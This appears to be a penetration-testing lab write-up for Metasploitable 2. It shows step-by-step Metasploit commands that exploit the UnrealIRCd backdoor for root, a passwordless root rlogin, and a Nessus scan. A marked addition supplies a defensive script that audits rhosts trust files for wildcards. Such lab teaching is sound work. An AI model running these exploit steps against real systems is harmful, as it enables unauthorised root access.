Metasploitable 2 – Compromise: UnrealIRC

Let's take a look at this Nmap result in more detail:

6667/tcp  open  irc         UnrealIRCd

Nessus results also show some details here:

Critical (10.0) 46882 UnrealIRCd Backdoor Detection

Worth checking to see if Metasploit has a module we can use here. Fire up Metasploit with:

msfconsole

And let's do a search for any hits on ‘unrealirc’:

search unrealirc


Great, we have a hit. Let's choose this exploit:

use exploit/unix/irc/unreal_ircd_3281_backdoor


We now need to configure it. To see what’s required, use:

show options


Let's set our target (using our Metasploitable IP address) with:

set RHOST 192.168.168.134

Once done you can run ‘show options’ again to confirm it looks good.

Now let's see if it works by typing ‘run’:

run


Be aware that you may not get much feedback even if the exploit is successful.

Try typing ‘hostname’ and see what comes back. As you can see, the exploit was successful: we have root access to the Metasploitable box once more.

Metasploitable 2 – Compromise: rlogin

One of the simplest compromises of the Metasploitable box.

We can see from the nmap results:

513/tcp   open  login?

Nessus also detected the use of rlogin:

High (7.5) 10205 rlogin Service Detection

At this stage we don’t have any info on possible accounts on the Metasploitable box, but it is likely that there is a ‘root’ account.

As such we can try the following command and see what we get:

rlogin -l root 192.168.168.134
  • -l: user to log in as


So we are prompted for a password – a good sign the root account is valid.

But there is actually more to this than the above suggests.

I am using a fresh install of Kali 2 and the rsh-client is not installed by default. So let's install it with:

apt-get install rsh-client


Now let's try that original rlogin command once more.

Bingo… we’re in, and with root access no less.
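An added example, not part of the original post: rlogin can skip the password prompt when the server's trust files (/etc/hosts.equiv and per-user ~/.rhosts) accept the connecting host and user, so a defender's follow-up to a result like the one above is to audit those files for wildcard entries. The post does not show the target's trust files; the function name, finding wording and sample contents below are constructed for illustration.

```python
"""Audit an r-services trust file (hosts.equiv or .rhosts) for wildcards."""

# Constructed sample contents; not taken from the post or its target box.
SAMPLE_RHOSTS = """\
# host [user]
trusted.example.internal alice
+ +
+@admins
-denied.example.internal
10.0.0.5 +
"""


def audit_trust_file(text):
    """Return [(line_no, entry, reason)] for entries that grant broad trust.

    Each entry is 'host [user]'. A bare '+' is a wildcard in either field,
    '+@name' trusts a whole netgroup, and a leading '-' is a deny entry.
    """
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue  # blank line or comment
        fields = entry.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host.startswith("-"):
            continue  # explicit deny, not a grant
        reasons = []
        if host == "+":
            reasons.append("any host trusted")
        elif host.startswith("+@"):
            reasons.append("netgroup trusted: " + host[2:])
        if user == "+":
            reasons.append("any remote user trusted")
        if reasons:
            findings.append((line_no, entry, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for line_no, entry, reason in audit_trust_file(SAMPLE_RHOSTS):
        print(f"line {line_no}: {entry!r} -> {reason}")
```

On a real host the inputs would be /etc/hosts.equiv and each account's ~/.rhosts. Any finding is a reason to remove the entry, and the longer-term fix is to disable the r-services in favour of SSH.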

Metasploitable 2 – Vuln scan with Nessus

One of the simplest ways to spot an easy attack vector is to perform a vuln check against the box.

In this case I am going to use Nessus Home (https://www.tenable.com/products/nessus-home) as it is free to sign up and does the job well.

Once Nessus Home is up and running (and up to date) we can kick off a scan against our box.

And once complete we can take a look at the results.

The full list of results with details can be found here:

Nessus Scan Report